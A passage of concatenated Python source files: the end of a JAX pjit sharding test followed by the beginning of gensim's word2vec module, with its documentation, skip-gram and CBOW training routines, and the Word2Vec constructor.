"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = np.random.default_rng(1)
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.integers(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
word2vec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: Shiva Manne <manneshiva@gmail.com>
# Copyright (C) 2018 RaRe Technologies s.r.o.
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""This module implements the word2vec family of algorithms, using highly optimized C routines,
data streaming and Pythonic interfaces.
The word2vec algorithms include skip-gram and CBOW models, using either
hierarchical softmax or negative sampling: `Tomas Mikolov et al: Efficient Estimation of Word Representations
in Vector Space <https://arxiv.org/pdf/1301.3781.pdf>`_, `Tomas Mikolov et al: Distributed Representations of Words
and Phrases and their Compositionality <https://arxiv.org/abs/1310.4546>`_.
Other embeddings
================
There are more ways to train word vectors in Gensim than just Word2Vec.
See also :class:`~gensim.models.doc2vec.Doc2Vec`, :class:`~gensim.models.fasttext.FastText` and
wrappers for :class:`~gensim.models.wrappers.VarEmbed` and :class:`~gensim.models.wrappers.WordRank`.
The training algorithms were originally ported from the C package https://code.google.com/p/word2vec/
and extended with additional functionality and optimizations over the years.
For a tutorial on Gensim word2vec, with an interactive web app trained on GoogleNews,
visit https://rare-technologies.com/word2vec-tutorial/.
**Make sure you have a C compiler before installing Gensim, to use the optimized word2vec routines**
(70x speedup compared to plain NumPy implementation, https://rare-technologies.com/parallelizing-word2vec-in-python/).
Usage examples
==============
Initialize a model with e.g.:
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts, get_tmpfile
>>> from gensim.models import Word2Vec
>>>
>>> path = get_tmpfile("word2vec.model")
>>>
>>> model = Word2Vec(common_texts, size=100, window=5, min_count=1, workers=4)
>>> model.save("word2vec.model")
The training is streamed, meaning `sentences` can be a generator, reading input data
from disk on-the-fly, without loading the entire corpus into RAM.
It also means you can continue training the model later:
.. sourcecode:: pycon
>>> model = Word2Vec.load("word2vec.model")
>>> model.train([["hello", "world"]], total_examples=1, epochs=1)
(0, 2)
The trained word vectors are stored in a :class:`~gensim.models.keyedvectors.KeyedVectors` instance in `model.wv`:
.. sourcecode:: pycon
>>> vector = model.wv['computer'] # numpy vector of a word
The reason for separating the trained vectors into `KeyedVectors` is that if you don't
need the full model state any more (don't need to continue training), the state can discarded,
resulting in a much smaller and faster object that can be mmapped for lightning
fast loading and sharing the vectors in RAM between processes:
.. sourcecode:: pycon
>>> from gensim.models import KeyedVectors
>>>
>>> path = get_tmpfile("wordvectors.kv")
>>>
>>> model.wv.save(path)
>>> wv = KeyedVectors.load("model.wv", mmap='r')
>>> vector = wv['computer'] # numpy vector of a word
Gensim can also load word vectors in the "word2vec C format", as a
:class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>>
>>> wv_from_text = KeyedVectors.load_word2vec_format(datapath('word2vec_pre_kv_c'), binary=False) # C text format
>>> wv_from_bin = KeyedVectors.load_word2vec_format(datapath("euclidean_vectors.bin"), binary=True) # C bin format
It is impossible to continue training the vectors loaded from the C format because the hidden weights,
vocabulary frequencies and the binary tree are missing. To continue training, you'll need the
full :class:`~gensim.models.word2vec.Word2Vec` object state, as stored by :meth:`~gensim.models.word2vec.Word2Vec.save`,
not just the :class:`~gensim.models.keyedvectors.KeyedVectors`.
You can perform various NLP word tasks with a trained model. Some of them
are already built-in - you can see it in :mod:`gensim.models.keyedvectors`.
If you're finished training a model (i.e. no more updates, only querying),
you can switch to the :class:`~gensim.models.keyedvectors.KeyedVectors` instance:
.. sourcecode:: pycon
>>> word_vectors = model.wv
>>> del model
to trim unneeded model state = use much less RAM and allow fast loading and memory sharing (mmap).
Note that there is a :mod:`gensim.models.phrases` module which lets you automatically
detect phrases longer than one word. Using phrases, you can learn a word2vec model
where "words" are actually multiword expressions, such as `new_york_times` or `financial_crisis`:
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts
>>> from gensim.models import Phrases
>>>
>>> bigram_transformer = Phrases(common_texts)
>>> model = Word2Vec(bigram_transformer[common_texts], min_count=1)
"""
from __future__ import division # py3 "true division"
import logging
import sys
import os
import heapq
from timeit import default_timer
from copy import deepcopy
from collections import defaultdict
import threading
import itertools
import warnings
from gensim.utils import keep_vocab_item, call_on_class_only
from gensim.models.keyedvectors import Vocab, Word2VecKeyedVectors
from gensim.models.base_any2vec import BaseWordEmbeddingsModel
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
from numpy import exp, dot, zeros, random, dtype, float32 as REAL,\
uint32, seterr, array, uint8, vstack, fromstring, sqrt,\
empty, sum as np_sum, ones, logaddexp, log, outer
from scipy.special import expit
from gensim import utils, matutils # utility fnc for pickling, common scipy operations etc
from gensim.utils import deprecated
from six import iteritems, itervalues, string_types
from six.moves import range
logger = logging.getLogger(__name__)
try:
from gensim.models.word2vec_inner import train_batch_sg, train_batch_cbow
from gensim.models.word2vec_inner import score_sentence_sg, score_sentence_cbow
from gensim.models.word2vec_inner import FAST_VERSION, MAX_WORDS_IN_BATCH
except ImportError:
# failed... fall back to plain numpy (20-80x slower training than the above)
FAST_VERSION = -1
MAX_WORDS_IN_BATCH = 10000
def train_batch_sg(model, sentences, alpha, work=None, compute_loss=False):
"""Update skip-gram model by training on a sequence of sentences.
Called internally from :meth:`~gensim.models.word2vec.Word2Vec.train`.
Warnings
--------
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2Vec.Word2Vec`
The Word2Vec model instance to train.
sentences : iterable of list of str
The corpus used to train the model.
alpha : float
The learning rate
work : object, optional
Unused.
compute_loss : bool, optional
Whether or not the training loss should be computed in this batch.
Returns
-------
int
Number of words in the vocabulary actually used for training (that already existed in the vocabulary
and were not discarded by negative sampling).
"""
result = 0
for sentence in sentences:
word_vocabs = [model.wv.vocab[w] for w in sentence if w in model.wv.vocab
and model.wv.vocab[w].sample_int > model.random.rand() * 2 ** 32]
for pos, word in enumerate(word_vocabs):
reduced_window = model.random.randint(model.window) # `b` in the original word2vec code
# now go over all words from the (reduced) window, predicting each one in turn
start = max(0, pos - model.window + reduced_window)
for pos2, word2 in enumerate(word_vocabs[start:(pos + model.window + 1 - reduced_window)], start):
# don't train on the `word` itself
if pos2 != pos:
train_sg_pair(
model, model.wv.index2word[word.index], word2.index, alpha, compute_loss=compute_loss
)
result += len(word_vocabs)
return result
def train_batch_cbow(model, sentences, alpha, work=None, neu1=None, compute_loss=False):
"""Update CBOW model by training on a sequence of sentences.
Called internally from :meth:`~gensim.models.word2vec.Word2Vec.train`.
Warnings
--------
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The Word2Vec model instance to train.
sentences : iterable of list of str
The corpus used to train the model.
alpha : float
The learning rate
work : object, optional
Unused.
neu1 : object, optional
Unused.
compute_loss : bool, optional
Whether or not the training loss should be computed in this batch.
Returns
-------
int
Number of words in the vocabulary actually used for training (that already existed in the vocabulary
and were not discarded by negative sampling).
"""
result = 0
for sentence in sentences:
word_vocabs = [
model.wv.vocab[w] for w in sentence if w in model.wv.vocab
and model.wv.vocab[w].sample_int > model.random.rand() * 2 ** 32
]
for pos, word in enumerate(word_vocabs):
reduced_window = model.random.randint(model.window) # `b` in the original word2vec code
start = max(0, pos - model.window + reduced_window)
window_pos = enumerate(word_vocabs[start:(pos + model.window + 1 - reduced_window)], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.wv.syn0[word2_indices], axis=0) # 1 x vector_size
if word2_indices and model.cbow_mean:
l1 /= len(word2_indices)
train_cbow_pair(model, word, word2_indices, l1, alpha, compute_loss=compute_loss)
result += len(word_vocabs)
return result
def score_sentence_sg(model, sentence, work=None):
"""Obtain likelihood score for a single sentence in a fitted skip-gram representation.
Notes
-----
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model. It **MUST** have been trained using hierarchical softmax and the skip-gram algorithm.
sentence : list of str
The words comprising the sentence to be scored.
work : object, optional
Unused. For interface compatibility only.
Returns
-------
float
The probability assigned to this sentence by the Skip-Gram model.
"""
log_prob_sentence = 0.0
if model.negative:
raise RuntimeError("scoring is only available for HS=True")
word_vocabs = [model.wv.vocab[w] for w in sentence if w in model.wv.vocab]
for pos, word in enumerate(word_vocabs):
if word is None:
continue # OOV word in the input sentence => skip
# now go over all words from the window, predicting each one in turn
start = max(0, pos - model.window)
for pos2, word2 in enumerate(word_vocabs[start: pos + model.window + 1], start):
# don't train on OOV words and on the `word` itself
if word2 is not None and pos2 != pos:
log_prob_sentence += score_sg_pair(model, word, word2)
return log_prob_sentence
def score_sentence_cbow(model, sentence, work=None, neu1=None):
"""Obtain likelihood score for a single sentence in a fitted CBOW representation.
Notes
-----
This is the non-optimized, pure Python version. If you have a C compiler, Gensim
will use an optimized code path from :mod:`gensim.models.word2vec_inner` instead.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model. It **MUST** have been trained using hierarchical softmax and the CBOW algorithm.
sentence : list of str
The words comprising the sentence to be scored.
work : object, optional
Unused. For interface compatibility only.
neu1 : object, optional
Unused. For interface compatibility only.
Returns
-------
float
The probability assigned to this sentence by the CBOW model.
"""
log_prob_sentence = 0.0
if model.negative:
raise RuntimeError("scoring is only available for HS=True")
word_vocabs = [model.wv.vocab[w] for w in sentence if w in model.wv.vocab]
for pos, word in enumerate(word_vocabs):
if word is None:
continue # OOV word in the input sentence => skip
start = max(0, pos - model.window)
window_pos = enumerate(word_vocabs[start:(pos + model.window + 1)], start)
word2_indices = [word2.index for pos2, word2 in window_pos if (word2 is not None and pos2 != pos)]
l1 = np_sum(model.wv.syn0[word2_indices], axis=0) # 1 x layer1_size
if word2_indices and model.cbow_mean:
l1 /= len(word2_indices)
log_prob_sentence += score_cbow_pair(model, word, l1)
return log_prob_sentence
try:
from gensim.models.word2vec_corpusfile import train_epoch_sg, train_epoch_cbow, CORPUSFILE_VERSION
except ImportError:
# file-based word2vec is not supported
CORPUSFILE_VERSION = -1
def train_epoch_sg(model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss):
raise RuntimeError("Training with corpus_file argument is not supported")
def train_epoch_cbow(model, corpus_file, offset, _cython_vocab, _cur_epoch, _expected_examples, _expected_words,
_work, _neu1, compute_loss):
raise RuntimeError("Training with corpus_file argument is not supported")
def train_sg_pair(model, word, context_index, alpha, learn_vectors=True, learn_hidden=True,
context_vectors=None, context_locks=None, compute_loss=False, is_ft=False):
"""Train the passed model instance on a word and its context, using the Skip-gram algorithm.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The model to be trained.
word : str
The label (predicted) word.
context_index : list of int
The vocabulary indices of the words in the context.
alpha : float
Learning rate.
learn_vectors : bool, optional
Whether the vectors should be updated.
learn_hidden : bool, optional
Whether the weights of the hidden layer should be updated.
context_vectors : list of list of float, optional
Vector representations of the words in the context. If None, these will be retrieved from the model.
context_locks : list of float, optional
The lock factors for each word in the context.
compute_loss : bool, optional
Whether or not the training loss should be computed.
is_ft : bool, optional
If True, weights will be computed using `model.wv.syn0_vocab` and `model.wv.syn0_ngrams`
instead of `model.wv.syn0`.
Returns
-------
numpy.ndarray
Error vector to be back-propagated.
"""
if context_vectors is None:
if is_ft:
context_vectors_vocab = model.wv.syn0_vocab
context_vectors_ngrams = model.wv.syn0_ngrams
else:
context_vectors = model.wv.syn0
if context_locks is None:
if is_ft:
context_locks_vocab = model.syn0_vocab_lockf
context_locks_ngrams = model.syn0_ngrams_lockf
else:
context_locks = model.syn0_lockf
if word not in model.wv.vocab:
return
predict_word = model.wv.vocab[word] # target word (NN output)
if is_ft:
l1_vocab = context_vectors_vocab[context_index[0]]
l1_ngrams = np_sum(context_vectors_ngrams[context_index[1:]], axis=0)
if context_index:
l1 = np_sum([l1_vocab, l1_ngrams], axis=0) / len(context_index)
else:
l1 = context_vectors[context_index] # input word (NN input/projection layer)
lock_factor = context_locks[context_index]
neu1e = zeros(l1.shape)
if model.hs:
# work on the entire tree at once, to push as much work into numpy's C routines as possible (performance)
l2a = deepcopy(model.syn1[predict_word.point]) # 2d matrix, codelen x layer1_size
prod_term = dot(l1, l2a.T)
fa = expit(prod_term) # propagate hidden -> output
ga = (1 - predict_word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1[predict_word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
# loss component corresponding to hierarchical softmax
if compute_loss:
sgn = (-1.0) ** predict_word.code # `ch` function, 0 -> 1, 1 -> -1
lprob = -log(expit(-sgn * prod_term))
model.running_training_loss += sum(lprob)
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [predict_word.index]
while len(word_indices) < model.negative + 1:
w = model.cum_table.searchsorted(model.random.randint(model.cum_table[-1]))
if w != predict_word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
prod_term = dot(l1, l2b.T)
fb = expit(prod_term) # propagate hidden -> output
gb = (model.neg_labels - fb) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# loss component corresponding to negative sampling
if compute_loss:
model.running_training_loss -= sum(log(expit(-1 * prod_term[1:]))) # for the sampled words
model.running_training_loss -= log(expit(prod_term[0])) # for the output word
if learn_vectors:
if is_ft:
model.wv.syn0_vocab[context_index[0]] += neu1e * context_locks_vocab[context_index[0]]
for i in context_index[1:]:
model.wv.syn0_ngrams[i] += neu1e * context_locks_ngrams[i]
else:
l1 += neu1e * lock_factor # learn input -> hidden (mutates model.wv.syn0[word2.index], if that is l1)
return neu1e
def train_cbow_pair(model, word, input_word_indices, l1, alpha, learn_vectors=True, learn_hidden=True,
compute_loss=False, context_vectors=None, context_locks=None, is_ft=False):
"""Train the passed model instance on a word and its context, using the CBOW algorithm.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The model to be trained.
word : str
The label (predicted) word.
input_word_indices : list of int
The vocabulary indices of the words in the context.
l1 : list of float
Vector representation of the label word.
alpha : float
Learning rate.
learn_vectors : bool, optional
Whether the vectors should be updated.
learn_hidden : bool, optional
Whether the weights of the hidden layer should be updated.
compute_loss : bool, optional
Whether or not the training loss should be computed.
context_vectors : list of list of float, optional
Vector representations of the words in the context. If None, these will be retrieved from the model.
context_locks : list of float, optional
The lock factors for each word in the context.
is_ft : bool, optional
If True, weights will be computed using `model.wv.syn0_vocab` and `model.wv.syn0_ngrams`
instead of `model.wv.syn0`.
Returns
-------
numpy.ndarray
Error vector to be back-propagated.
"""
if context_vectors is None:
if is_ft:
context_vectors_vocab = model.wv.syn0_vocab
context_vectors_ngrams = model.wv.syn0_ngrams
else:
context_vectors = model.wv.syn0
if context_locks is None:
if is_ft:
context_locks_vocab = model.syn0_vocab_lockf
context_locks_ngrams = model.syn0_ngrams_lockf
else:
context_locks = model.syn0_lockf
neu1e = zeros(l1.shape)
if model.hs:
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
prod_term = dot(l1, l2a.T)
fa = expit(prod_term) # propagate hidden -> output
ga = (1. - word.code - fa) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1[word.point] += outer(ga, l1) # learn hidden -> output
neu1e += dot(ga, l2a) # save error
# loss component corresponding to hierarchical softmax
if compute_loss:
sgn = (-1.0) ** word.code # ch function, 0-> 1, 1 -> -1
model.running_training_loss += sum(-log(expit(-sgn * prod_term)))
if model.negative:
# use this word (label = 1) + `negative` other random words not from this sentence (label = 0)
word_indices = [word.index]
while len(word_indices) < model.negative + 1:
w = model.cum_table.searchsorted(model.random.randint(model.cum_table[-1]))
if w != word.index:
word_indices.append(w)
l2b = model.syn1neg[word_indices] # 2d matrix, k+1 x layer1_size
prod_term = dot(l1, l2b.T)
fb = expit(prod_term) # propagate hidden -> output
gb = (model.neg_labels - fb) * alpha # vector of error gradients multiplied by the learning rate
if learn_hidden:
model.syn1neg[word_indices] += outer(gb, l1) # learn hidden -> output
neu1e += dot(gb, l2b) # save error
# loss component corresponding to negative sampling
if compute_loss:
model.running_training_loss -= sum(log(expit(-1 * prod_term[1:]))) # for the sampled words
model.running_training_loss -= log(expit(prod_term[0])) # for the output word
if learn_vectors:
# learn input -> hidden, here for all words in the window separately
if is_ft:
if not model.cbow_mean and input_word_indices:
neu1e /= (len(input_word_indices[0]) + len(input_word_indices[1]))
for i in input_word_indices[0]:
context_vectors_vocab[i] += neu1e * context_locks_vocab[i]
for i in input_word_indices[1]:
context_vectors_ngrams[i] += neu1e * context_locks_ngrams[i]
else:
if not model.cbow_mean and input_word_indices:
neu1e /= len(input_word_indices)
for i in input_word_indices:
context_vectors[i] += neu1e * context_locks[i]
return neu1e
def score_sg_pair(model, word, word2):
"""Score the trained Skip-gram model on a pair of words.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model.
word : :class:`~gensim.models.keyedvectors.Vocab`
Vocabulary representation of the first word.
word2 : :class:`~gensim.models.keyedvectors.Vocab`
Vocabulary representation of the second word.
Returns
-------
float
Logarithm of the sum of exponentiations of input words.
"""
l1 = model.wv.syn0[word2.index]
l2a = deepcopy(model.syn1[word.point]) # 2d matrix, codelen x layer1_size
sgn = (-1.0) ** word.code # ch function, 0-> 1, 1 -> -1
lprob = -logaddexp(0, -sgn * dot(l1, l2a.T))
return sum(lprob)
def score_cbow_pair(model, word, l1):
"""Score the trained CBOW model on a pair of words.
Parameters
----------
model : :class:`~gensim.models.word2vec.Word2Vec`
The trained model.
word : :class:`~gensim.models.keyedvectors.Vocab`
Vocabulary representation of the first word.
l1 : list of float
Vector representation of the second word.
Returns
-------
float
Logarithm of the sum of exponentiations of input words.
"""
l2a = model.syn1[word.point] # 2d matrix, codelen x layer1_size
sgn = (-1.0) ** word.code # ch function, 0-> 1, 1 -> -1
lprob = -logaddexp(0, -sgn * dot(l1, l2a.T))
return sum(lprob)
class Word2Vec(BaseWordEmbeddingsModel):
"""Train, use and evaluate neural networks described in https://code.google.com/p/word2vec/.
Once you're finished training a model (=no more updates, only querying)
store and use only the :class:`~gensim.models.keyedvectors.KeyedVectors` instance in `self.wv` to reduce memory.
The model can be stored/loaded via its :meth:`~gensim.models.word2vec.Word2Vec.save` and
:meth:`~gensim.models.word2vec.Word2Vec.load` methods.
The trained word vectors can also be stored/loaded from a format compatible with the
original word2vec implementation via `self.wv.save_word2vec_format`
and :meth:`gensim.models.keyedvectors.KeyedVectors.load_word2vec_format`.
Some important attributes are the following:
Attributes
----------
wv : :class:`~gensim.models.keyedvectors.Word2VecKeyedVectors`
This object essentially contains the mapping between words and embeddings. After training, it can be used
directly to query those embeddings in various ways. See the module level docstring for examples.
vocabulary : :class:`~gensim.models.word2vec.Word2VecVocab`
This object represents the vocabulary (sometimes called Dictionary in gensim) of the model.
Besides keeping track of all unique words, this object provides extra functionality, such as
constructing a huffman tree (frequent words are closer to the root), or discarding extremely rare words.
trainables : :class:`~gensim.models.word2vec.Word2VecTrainables`
This object represents the inner shallow neural network used to train the embeddings. The semantics of the
network differ slightly in the two available training modes (CBOW or SG) but you can think of it as a NN with
a single projection and hidden layer which we train on the corpus. The weights are then used as our embeddings
(which means that the size of the hidden layer is equal to the number of features `self.size`).
"""
def __init__(self, sentences=None, corpus_file=None, size=100, alpha=0.025, window=5, min_count=5,
max_vocab_size=None, sample=1e-3, seed=1, workers=3, min_alpha=0.0001,
sg=0, hs=0, negative=5, ns_exponent=0.75, cbow_mean=1, hashfxn=hash, iter=5, null_word=0,
trim_rule=None, sorted_vocab=1, batch_words=MAX_WORDS_IN_BATCH, compute_loss=False, callbacks=(),
max_final_vocab=None):
"""
Parameters
----------
sentences : iterable of iterables, optional
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
If you don't supply `sentences`, the model is left uninitialized -- use if you plan to initialize it
in some other way.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (or none of them, in that case, the model is left uninitialized).
size : int, optional
Dimensionality of the word vectors.
window : int, optional
Maximum distance between the current and predicted word within a sentence.
min_count : int, optional
Ignores all words with total frequency lower than this.
workers : int, optional
Use these many worker threads to train the model (=faster training with multicore machines).
sg : {0, 1}, optional
Training algorithm: 1 for skip-gram; otherwise CBOW.
hs : {0, 1}, optional
If 1, hierarchical softmax will be used for model training.
If 0, and `negative` is non-zero, negative sampling will be used.
negative : int, optional
If > 0, negative sampling will be used, the int for negative specifies how many "noise words"
should be drawn (usually between 5-20).
If set to 0, no negative sampling is used.
ns_exponent : float, optional
The exponent used to shape the negative sampling distribution. A value of 1.0 samples exactly in proportion
to the frequencies, 0.0 samples all words equally, while a negative value samples low-frequency words more
than high-frequency words. The popular default value of 0.75 was chosen by the original Word2Vec paper.
More recently, in https://arxiv.org/abs/1804.04212, Caselles-Dupré, Lesaint, & Royo-Letelier suggest that
other values may perform better for recommendation applications.
cbow_mean : {0, 1}, optional
If 0, use the sum of the context word vectors. If 1, use the mean, only applies when cbow is used.
alpha : float, optional
The initial learning rate.
min_alpha : float, optional
Learning rate will linearly drop to `min_alpha` as training progresses.
seed : int, optional
Seed for the random number generator. Initial vectors for each word are seeded with a hash of
the concatenation of word + `str(seed)`. Note that for a fully deterministically-reproducible run,
you must also limit the model to a single worker thread (`workers=1`), to eliminate ordering jitter
from OS thread scheduling. (In Python 3, reproducibility between interpreter launches also requires
use of the `PYTHONHASHSEED` environment variable to control hash randomization).
max_vocab_size : int, optional
Limits the RAM during vocabulary building; if there are more unique
words than this, then prune the infrequent ones. Every 10 million word types need about 1GB of RAM.
Set to `None` for no limit.
max_final_vocab : int, optional
Limits the vocab to a target vocab size by automatically picking a matching min_count. If the specified
min_count is more than the calculated min_count, the specified min_count will be used.
Set to `None` if not required.
sample : float, optional
The threshold for configuring which higher-frequency words are randomly downsampled,
useful range is (0, 1e-5).
hashfxn : function, optional
Hash function to use to randomly initialize weights, for increased training reproducibility.
iter : int, optional
Number of iterations (epochs) over the corpus.
trim_rule : function, optional
Vocabulary trimming rule, specifies whether certain words should remain in the vocabulary,
be trimmed away, or handled using the default (discard if word count < min_count).
Can be None (min_count will be used, look to :func:`~gensim.utils.keep_vocab_item`),
or a callable that accepts parameters (word, count, min_count) and returns either
:attr:`gensim.utils.RULE_DISCARD`, :attr:`gensim.utils.RULE_KEEP` or :attr:`gensim.utils.RULE_DEFAULT`.
The rule, if given, is only used to prune vocabulary during build_vocab() and is not stored as part of the
model.
The input parameters are of the following types:
* `word` (str) - the word we are examining
* `count` (int) - the word's frequency count in the corpus
* `min_count` (int) - the minimum count threshold.
sorted_vocab : {0, 1}, optional
If 1, sort the vocabulary by descending frequency before assigning word indexes.
See :meth:`~gensim.models.word2vec.Word2VecVocab.sort_vocab()`.
batch_words : int, optional
Target size (in words) for batches of examples passed to worker threads (and
thus cython routines).(Larger batches will be passed if individual
texts are longer than 10000 words, but the standard cython code truncates to that maximum.)
compute_loss: bool, optional
If True, computes and stores loss value which can be retrieved using
:meth:`~gensim.models.word2vec.Word2Vec.get_latest_training_loss`.
callbacks : iterable of :class:`~gensim.models.callbacks.CallbackAny2Vec`, optional
Sequence of callbacks to be executed at specific stages during training.
Examples
--------
Initialize and train a :class:`~gensim.models.word2vec.Word2Vec` model
.. sourcecode:: pycon
>>> from gensim.models import Word2Vec
>>> sentences = [["cat", "say", "meow"], ["dog", "say", "woof"]]
>>> model = Word2Vec(sentences, min_count=1)
"""
self.max_final_vocab = max_final_vocab
self.callbacks = callbacks
self.load = call_on_class_only
self.wv = Word2VecKeyedVectors(size)
self.vocabulary = Word2VecVocab(
max_vocab_size=max_vocab_size, min_count=min_count, sample=sample, sorted_vocab=bool(sorted_vocab),
null_word=null_word, max_final_vocab=max_final_vocab, ns_exponent=ns_exponent)
self.trainables = Word2VecTrainables(seed=seed, vector_size=size, hashfxn=hashfxn)
super(Word2Vec, self).__init__(
sentences=sentences, corpus_file=corpus_file, workers=workers, vector_size=size, epochs=iter,
callbacks=callbacks, batch_words=batch_words, trim_rule=trim_rule, sg=sg, alpha=alpha, window=window,
seed=seed, hs=hs, negative=negative, cbow_mean=cbow_mean, min_alpha=min_alpha, compute_loss=compute_loss,
fast_version=FAST_VERSION)
def _do_train_epoch(self, corpus_file, thread_id, offset, cython_vocab, thread_private_mem, cur_epoch,
total_examples=None, total_words=None, **kwargs):
work, neu1 = thread_private_mem
if self.sg:
examples, tally, raw_tally = train_epoch_sg(self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss)
else:
examples, tally, raw_tally = train_epoch_cbow(self, corpus_file, offset, cython_vocab, cur_epoch,
total_examples, total_words, work, neu1, self.compute_loss)
return examples, tally, raw_tally
def _do_train_job(self, sentences, alpha, inits):
"""Train the model on a single batch of sentences.
Parameters
----------
sentences : iterable of list of str
Corpus chunk to be used in this training batch.
alpha : float
The learning rate used in this batch.
inits : (np.ndarray, np.ndarray)
Each worker threads private work memory.
Returns
-------
(int, int)
2-tuple (effective word count after ignoring unknown words and sentence length trimming, total word count).
"""
work, neu1 = inits
tally = 0
if self.sg:
tally += train_batch_sg(self, sentences, alpha, work, self.compute_loss)
else:
tally += train_batch_cbow(self, sentences, alpha, work, neu1, self.compute_loss)
return tally, self._raw_word_count(sentences)
def _clear_post_train(self):
"""Remove all L2-normalized word vectors from the model."""
self.wv.vectors_norm = None
def _set_train_params(self, **kwargs):
if 'compute_loss' in kwargs:
self.compute_loss = kwargs['compute_loss']
self.running_training_loss = 0
def train(self, sentences=None, corpus_file=None, total_examples=None, total_words=None,
epochs=None, start_alpha=None, end_alpha=None, word_count=0,
queue_factor=2, report_delay=1.0, compute_loss=False, callbacks=()):
"""Update the model's neural weights from a sequence of sentences.
Notes
-----
To support linear learning-rate decay from (initial) `alpha` to `min_alpha`, and accurate
progress-percentage logging, either `total_examples` (count of sentences) or `total_words` (count of
raw words in sentences) **MUST** be provided. If `sentences` is the same corpus
that was provided to :meth:`~gensim.models.word2vec.Word2Vec.build_vocab` earlier,
you can simply use `total_examples=self.corpus_count`.
Warnings
--------
To avoid common mistakes around the model's ability to do multiple training passes itself, an
explicit `epochs` argument **MUST** be provided. In the common and recommended case
where :meth:`~gensim.models.word2vec.Word2Vec.train` is only called once, you can set `epochs=self.iter`.
Parameters
----------
sentences : iterable of list of str
The `sentences` iterable can be simply a list of lists of tokens, but for larger corpora,
consider an iterable that streams the sentences directly from disk/network.
See :class:`~gensim.models.word2vec.BrownCorpus`, :class:`~gensim.models.word2vec.Text8Corpus`
or :class:`~gensim.models.word2vec.LineSentence` in :mod:`~gensim.models.word2vec` module for such examples.
See also the `tutorial on data streaming in Python
<https://rare-technologies.com/data-streaming-in-python-generators-iterators-iterables/>`_.
corpus_file : str, optional
Path to a corpus file in :class:`~gensim.models.word2vec.LineSentence` format.
You may use this argument instead of `sentences` to get performance boost. Only one of `sentences` or
`corpus_file` arguments need to be passed (not both of them).
total_examples : int
Count of sentences.
total_words : int
Count of raw words in sentences.
epochs : int
Number of iterations (epochs) over the corpus.
start_alpha : float, optional
Initial learning rate. If supplied, replaces the starting `alpha` from the constructor,
for this one call to`train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
end_alpha : float, optional
Final learning rate. Drops linearly from `start_alpha`.
If supplied, this replaces the final `min_alpha` from the constructor, for this one call to `train()`.
Use only if making multiple calls to `train()`, when you want to manage the alpha learning-rate yourself
(not recommended).
word_count : int, optional
Count of words already trained. Set this to 0 for the usual
case of training on all words in sentences.
queue_factor : int, optional
Multiplier for size of queue (number of workers * queue_factor).
report_delay : float, optional
Seconds to wait before reporting progress.
compute_loss: bool, optional
